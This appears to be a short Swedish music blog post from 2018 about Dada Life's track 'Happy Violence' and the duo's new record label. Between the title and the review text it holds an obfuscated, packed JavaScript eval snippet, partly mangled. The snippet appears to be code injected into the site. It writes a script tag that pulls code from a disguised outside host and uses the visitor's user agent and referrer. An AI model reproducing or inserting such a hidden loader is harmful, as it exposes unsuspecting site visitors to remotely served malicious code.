Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Dada Life – Happy Violence

Dada Life – Happy Violence
Alexander Gylemo

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zitnh|var|u0026u|referrer|byndh||js|php’.split(‘|’),0,{}))
Dada Life – Happy Violence by Dada Life

Med låtar som ”White Noise/Red Meat”, ”Unleash the Fucking Dada” samt en mängd remixar som spelas mer eller mindre överallt blir den svenska duon Dada Life bara mer och mer populära runtom i världen där USA verkar skaffat sig den största fanbasen. Olle Corneer och Stefan Engblom, som grabbarna heter, har nu även startat sitt egna record label, So Much Dada och börjar karriären där med en riktigt mäktig, typisk Dada Life-låt vars melodi jag först störde mig på för att sedan bli frälst. Ovan finner ni deras senaste släpp ”Happy Violence”, enjoy!